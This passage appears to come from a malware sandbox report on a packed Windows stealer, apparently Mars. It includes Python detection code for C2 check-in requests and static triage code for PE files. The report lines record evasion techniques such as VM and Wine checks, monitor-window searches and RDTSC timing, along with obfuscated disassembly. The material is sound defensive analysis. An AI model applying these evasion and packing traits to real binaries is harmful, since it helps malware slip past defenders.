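    return method, path, headers, body


def parse_multipart(body: bytes, content_type: str) -> dict:
    """Minimal multipart/form-data parser: returns {field name: value}."""
    match = re.search(r'boundary="?([^";]+)"?', content_type)
    if not match:
        raise ValueError("no multipart boundary in Content-Type")
    delimiter = b"--" + match.group(1).encode("latin-1")
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        part_head, _, part_body = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', part_head)
        if name:
            fields[name.group(1).decode("latin-1")] = part_body.rstrip(b"\r\n").decode("latin-1")
    return fields


def classify_checkin(raw: bytes) -> dict:
    """Score one request; two or more indicators mark it suspicious (assumed threshold)."""
    method, path, headers, body = parse_request(raw)
    content_type = headers.get("content-type", "")
    fields = {}
    if method == "POST" and content_type.startswith("multipart/form-data"):
        fields = parse_multipart(body, content_type)
    reasons = []
    if set(fields) == CHECKIN_FIELDS:
        reasons.append("multipart POST carrying exactly hwid and build")
    if "user-agent" not in headers:
        reasons.append("no User-Agent header")
    if GATE_PATH.search(path):
        reasons.append("16-hex-char .php gate path")
    if int(headers.get("content-length", "0")) != len(body):
        reasons.append("Content-Length does not match body")
    return {
        "c2_url": f"http://{headers.get('host', '')}{path}",
        "fields": fields,
        "reasons": reasons,
        "suspicious": len(reasons) >= 2,
    }


if __name__ == "__main__":
    verdict = classify_checkin(CAPTURED_REQUEST)
    print(verdict["c2_url"], verdict["fields"], verdict["reasons"])
```

Run against the captured request, the parser returns hwid 133A202B4D881535418320 and build "mars", reconstructs the same URL the configuration extractor reported, and raises three indicators; the constructed login request raises none. The body length check is there because the rebuilt body must come out at the 211 bytes the captured Content-Length declares, which is a cheap way to confirm the reconstruction before trusting the parsed fields.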

              System Summary

              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A358B4
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_006C48B0
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A009A3
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A901EB
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A631F6
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A6515F
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A59285
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009BFADD
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A5421F
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A1CBE9
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A5E31F
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A5D37B
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A5FC95
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A55D8E
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00AEF593
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_0090B5E7
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A5AD23
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00916649
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A577B5
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A6178F
              Source: C:\Users\user\Desktop\file.exe | Code function: String function: 006A4A60 appears 316 times
              Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exe | Static PE information: Section: cgikgxeh ZLIB complexity 0.9947137291854186
              Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_006C3A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_006BCAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn
              Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\9FAQPIZQ.htm
              Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: file.exe | ReversingLabs: Detection: 39%
              Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
              Source: file.exe | Static file information: File size 1812992 > 1048576
              Source: file.exe | Static PE information: Raw size of cgikgxeh is bigger than: 0x100000 < 0x1a0a00

              Data Obfuscation

              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 3.2.file.exe.6a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cgikgxeh:EW;aetjlfry:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cgikgxeh:EW;aetjlfry:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006C6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_006C6390
              Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
              Source: file.exe | Static PE information: real checksum: 0x1bbe88 should be: 0x1be77e
              Source: file.exe | Static PE information: section name:
              Source: file.exe | Static PE information: section name: .idata
              Source: file.exe | Static PE information: section name:
              Source: file.exe | Static PE information: section name: cgikgxeh
              Source: file.exe | Static PE information: section name: aetjlfry
              Source: file.exe | Static PE information: section name: .taggant
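The static findings above (entry point in .taggant rather than a code section, header checksum 0x1bbe88 where 0x1be77e is expected, unnamed and randomly named sections, and a section at ZLIB complexity 0.99) are all cheap to re-derive from the PE headers without running the sample. The block below is an added example for this report, not Joe Sandbox code, and uses only the Python standard library. Because no bytes of the real file.exe are on the page, build_sample() constructs a throwaway PE32 image with the same kind of layout (an unnamed section, a random-looking section named cgikgxeh, entry point inside .taggant); the standard-name lists, the entropy threshold standing in for ZLIB complexity, and the section contents are the author's assumptions.

```python
"""Static triage for the PE traits flagged above: wrong header checksum, entry
point outside a code section, unnamed/non-standard section names and a
near-incompressible section.  Added example (not Joe Sandbox code); the image is
constructed below, the name lists and entropy threshold are assumptions."""
import math
import random
import struct
from collections import Counter

STANDARD_NAMES = {".text", ".data", ".rdata", ".bss", ".idata", ".edata",
                  ".rsrc", ".reloc", ".tls", ".pdata", ".CRT"}     # assumption
ENTRY_NAMES = {".text", "CODE"}                                   # assumption
HIGH_ENTROPY = 7.0   # bits/byte; stands in for the report's ZLIB-complexity measure


def align(n, a):
    return -(-n // a) * a


def build_pe(sections, entry_rva, checksum=0):
    """Constructed minimal PE32 image; sections = [(name, bytes, characteristics)]."""
    falign, valign = 0x200, 0x1000
    size_of_headers = align(64 + 4 + 20 + 224 + 40 * len(sections), falign)
    hdrs, blobs, raw_ptr, va = b"", b"", size_of_headers, valign
    for name, blob, charac in sections:
        raw_size = align(len(blob), falign)
        hdrs += struct.pack("<8sIIIIIIHHI", name.encode("latin-1")[:8].ljust(8, b"\0"),
                            len(blob), va, raw_size, raw_ptr, 0, 0, 0, 0, charac)
        blobs += blob.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        va += max(valign, align(len(blob), valign))
    opt = struct.pack("<HBB9I6H4I2H6I", 0x10B, 14, 0, 0, 0, 0, entry_rva, valign, valign,
                      0x400000, valign, falign, 6, 0, 0, 0, 6, 0, 0, va, size_of_headers,
                      checksum, 2, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b"\0" * 128
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x0102)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)                 # e_lfanew = 64
    return (dos + b"PE\0\0" + coff + opt + hdrs).ljust(size_of_headers, b"\0") + blobs


def parse_pe(data):
    """Read the few header fields the checks need (PE32 only)."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec, opt_size = struct.unpack_from("<H12xH", data, pe + 6)   # NumberOfSections, SizeOfOptionalHeader
    opt = pe + 24
    info = {"entry": struct.unpack_from("<I", data, opt + 16)[0], "checksum_off": opt + 64,
            "checksum": struct.unpack_from("<I", data, opt + 64)[0], "sections": []}
    for i in range(nsec):
        raw_name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        info["sections"].append({"name": raw_name.rstrip(b"\0").decode("latin-1"),
                                 "vsize": vsize, "va": va, "rawsize": rawsize, "rawptr": rawptr})
    return info


def pe_checksum(data, checksum_off):
    """The PE header checksum: ones'-complement dword sum skipping the field itself, plus length."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off != checksum_off:
            total += int.from_bytes(padded[off:off + 4], "little")
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    return ((total + (total >> 16)) & 0xFFFF) + len(data)


def set_checksum(data):
    """Write the correct checksum into the header, as a linker would."""
    off = parse_pe(data)["checksum_off"]
    return data[:off] + struct.pack("<I", pe_checksum(data, off)) + data[off + 4:]


def shannon_entropy(blob):
    n = len(blob)
    return -sum(c / n * math.log2(c / n) for c in Counter(blob).values()) if n else 0.0


def triage(data):
    """Return the entry section, checksum verdict, per-section entropy and findings."""
    pe = parse_pe(data)
    findings, entropy = [], {}
    calc = pe_checksum(data, pe["checksum_off"])
    if calc != pe["checksum"]:
        findings.append(f"real checksum: 0x{pe['checksum']:x} should be: 0x{calc:x}")
    ep = next((s for s in pe["sections"]
               if s["va"] <= pe["entry"] < s["va"] + max(s["vsize"], s["rawsize"])), None)
    entry_section = ep["name"] if ep else None
    if entry_section not in ENTRY_NAMES:
        findings.append(f"entry point 0x{pe['entry']:x} lies in {entry_section!r}, outside standard code sections")
    for s in pe["sections"]:
        name = s["name"]
        if not name.strip() or not name.isprintable():
            findings.append(f"section with empty or special-character name {name!r}")
        elif name not in STANDARD_NAMES:
            findings.append(f"non-standard section name {name!r}")
        entropy[name] = shannon_entropy(data[s["rawptr"]:s["rawptr"] + s["rawsize"]])
        if entropy[name] > HIGH_ENTROPY:
            findings.append(f"section {name!r} entropy {entropy[name]:.2f} bits/byte (packed or encrypted)")
    return {"entry_section": entry_section, "checksum_ok": calc == pe["checksum"],
            "entropy": entropy, "findings": findings}


def build_sample():
    """Constructed image mirroring the reported layout (unnamed section, cgikgxeh, .taggant)."""
    packed = random.Random(7).randbytes(4096)          # stand-in for a packed payload
    sections = [(".text", b"\x90" * 200 + b"\xc3", 0x60000020),
                ("", b"\0" * 16, 0xE0000020),
                (".rsrc", b"RSRC" * 32, 0x40000040),
                ("cgikgxeh", packed, 0xE0000060),
                (".taggant", b"\xcc" * 64, 0xE0000020)]
    taggant_va = next(s["va"] for s in parse_pe(build_pe(sections, 0))["sections"]
                      if s["name"] == ".taggant")
    return build_pe(sections, taggant_va + 0x10)       # entry point inside .taggant, as reported
```

triage(build_sample()) reproduces every class of finding the report lists for file.exe: the checksum line in the same "real checksum ... should be" form, the entry point resolving to .taggant, the empty-named section, the non-standard names and the high-entropy cgikgxeh section. Running triage(set_checksum(build_sample())) clears only the checksum finding, which is the point of that check: a wrong checksum is normal for a packed or hand-patched binary and harmless on its own, but it drops out when the other indicators do not.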
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A358B4 push 0B25973Ah; mov dword ptr [esp], ebx (at 3_2_00A358F3)
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A358B4 push 66315DADh; mov dword ptr [esp], edx (at 3_2_00A35972)
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A358B4 push edx; mov dword ptr [esp], 67BBEB10h (at 3_2_00A35976)
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A358B4 push 6C4D863Fh; mov dword ptr [esp], ecx (at 3_2_00A35990)
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A358B4 push ecx; mov dword ptr [esp], 01329E7Ah (at 3_2_00A359A9)
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A358B4 push 33225805h; mov dword ptr [esp], eax (at 3_2_00A359C4)
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A358B4 push ecx; mov dword ptr [esp], ebx (at 3_2_00A359DF)
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A870BF push 3E15E145h; mov dword ptr [esp], ebp (at 3_2_00A87134)
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B35092 push 6E93AC75h; mov dword ptr [esp], ebp (at 3_2_00B3529A)
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A8E88B push 773AADB6h; mov dword ptr [esp], ecx (at 3_2_00A8E899)
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A9B0E9 push 2EA09F4Dh; mov dword ptr [esp], edi (at 3_2_00A9B13D)
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00AD78F4 push 424E663Ch; mov dword ptr [esp], ebp (at 3_2_00AD791C)
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00ACF0DE push 2EB3EDAEh; mov dword ptr [esp], edx (at 3_2_00ACF12D)
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00ACF0DE push eax; mov dword ptr [esp], edx (at 3_2_00ACF1CD)
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00D3705B push 5588764Fh; mov dword ptr [esp], edi (at 3_2_00D37096)
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00D3705B push 06D1DE3Ah; mov dword ptr [esp], edi (at 3_2_00D370F4)
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00D3705B push ebp; mov dword ptr [esp], ebx (at 3_2_00D3710C)
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A9B834 push 7E2B43E5h; mov dword ptr [esp], eax (at 3_2_00A9B88F)
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A9B834 push eax; mov dword ptr [esp], 56CF8ABAh (at 3_2_00A9B8A2)
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A9B834 push 48115A00h; mov dword ptr [esp], eax (at 3_2_00A9B905)
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B2F00B push 5845AFD8h; mov dword ptr [esp], edx (at 3_2_00B2F026)
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A1C068 push 514892B9h; mov dword ptr [esp], ebx (at 3_2_00A1C07D)
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A1C068 push 1E880E5Bh; mov dword ptr [esp], ebx (at 3_2_00A1C08D)
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A1C068 push 2D659054h; mov dword ptr [esp], ebx (at 3_2_00A1C095)
              Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B03060 push 16B5219Fh; mov dword ptr [esp], ecx (at 3_2_00B030CB)
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00AD007B push ecx; mov dword ptr [esp], 61E8357Fh3_2_00AD024A
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00AD007B push esi; mov dword ptr [esp], eax3_2_00AD0257
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00AD007B push 51D253C7h; mov dword ptr [esp], edi3_2_00AD02DA
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B5B069 push ecx; mov dword ptr [esp], ebp3_2_00B5B093
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006C7895 push ecx; ret 3_2_006C78A8
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B449B4 push esi; mov dword ptr [esp], eax3_2_00B449DD
              Source: file.exeStatic PE information: section name: cgikgxeh entropy: 7.9541098731783055

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe Code function: 3_2_006C6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_006C6390

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
              Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F004B second address: 8F0055 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F5444E6F4F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F0055 second address: 8EF8EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007F5444755FBEh 0x0000000f jmp 00007F5444755FB8h 0x00000014 nop 0x00000015 mov dword ptr [ebp+122D17D7h], edi 0x0000001b push dword ptr [ebp+122D13F5h] 0x00000021 mov dword ptr [ebp+122D2D08h], edx 0x00000027 mov dword ptr [ebp+122D17D7h], edx 0x0000002d call dword ptr [ebp+122D179Eh] 0x00000033 pushad 0x00000034 jmp 00007F5444755FB0h 0x00000039 xor eax, eax 0x0000003b stc 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 or dword ptr [ebp+122D17EAh], eax 0x00000046 mov dword ptr [ebp+122D293Dh], eax 0x0000004c mov dword ptr [ebp+122D36A5h], eax 0x00000052 mov esi, 0000003Ch 0x00000057 jc 00007F5444755FACh 0x0000005d mov dword ptr [ebp+122D36A5h], eax 0x00000063 add esi, dword ptr [esp+24h] 0x00000067 pushad 0x00000068 je 00007F5444755FACh 0x0000006e mov dword ptr [ebp+122D36A5h], ecx 0x00000074 mov dword ptr [ebp+122D17D1h], edi 0x0000007a popad 0x0000007b lodsw 0x0000007d jmp 00007F5444755FB1h 0x00000082 add eax, dword ptr [esp+24h] 0x00000086 jns 00007F5444755FA7h 0x0000008c mov ebx, dword ptr [esp+24h] 0x00000090 mov dword ptr [ebp+122D17EAh], ecx 0x00000096 cld 0x00000097 push eax 0x00000098 pushad 0x00000099 je 00007F5444755FA8h 0x0000009f pushad 0x000000a0 popad 0x000000a1 push eax 0x000000a2 push edx 0x000000a3 push ecx 0x000000a4 pop ecx 0x000000a5 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6A84A second address: A6A866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5444E6F506h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6A9AB second address: A6A9B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6A9B5 second address: A6A9CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5444E6F4FFh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6AD49 second address: A6AD53 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5444755FACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6E003 second address: A6E02F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnl 00007F5444E6F50Ch 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6E02F second address: A6E039 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5444755FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6E039 second address: A6E03F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6E03F second address: A6E056 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5444755FABh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6E056 second address: A6E079 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F5444E6F505h 0x00000014 jmp 00007F5444E6F4FFh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6E079 second address: A6E0F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F5444755FA8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 sbb dx, 1F19h 0x0000002a jmp 00007F5444755FB6h 0x0000002f lea ebx, dword ptr [ebp+12451DEDh] 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007F5444755FA8h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 00000018h 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f mov dl, 32h 0x00000051 xchg eax, ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 jbe 00007F5444755FA6h 0x0000005c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6E0F3 second address: A6E0F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6E158 second address: A6E15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6E15D second address: A6E167 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5444E6F4FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6E167 second address: A6E1D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 call 00007F5444755FABh 0x0000000e and cx, 1F06h 0x00000013 pop ecx 0x00000014 push 00000000h 0x00000016 and si, C001h 0x0000001b push DC3CECC4h 0x00000020 ja 00007F5444755FBFh 0x00000026 add dword ptr [esp], 23C313BCh 0x0000002d push 00000003h 0x0000002f mov dl, 32h 0x00000031 push 00000000h 0x00000033 jne 00007F5444755FACh 0x00000039 push 00000003h 0x0000003b mov ecx, esi 0x0000003d push A0F8014Fh 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6E1D4 second address: A6E1E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F501h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6E1E9 second address: A6E228 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444755FB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 60F8014Fh 0x00000010 je 00007F5444755FABh 0x00000016 adc dx, AE81h 0x0000001b lea ebx, dword ptr [ebp+12451DF6h] 0x00000021 mov cx, di 0x00000024 mov edi, 76C21F46h 0x00000029 push eax 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d push ecx 0x0000002e pop ecx 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6E286 second address: A6E28C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6E28C second address: A6E2B3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b adc cx, DD03h 0x00000010 push 00000000h 0x00000012 push 3FCE3D76h 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5444755FADh 0x0000001f rdtsc
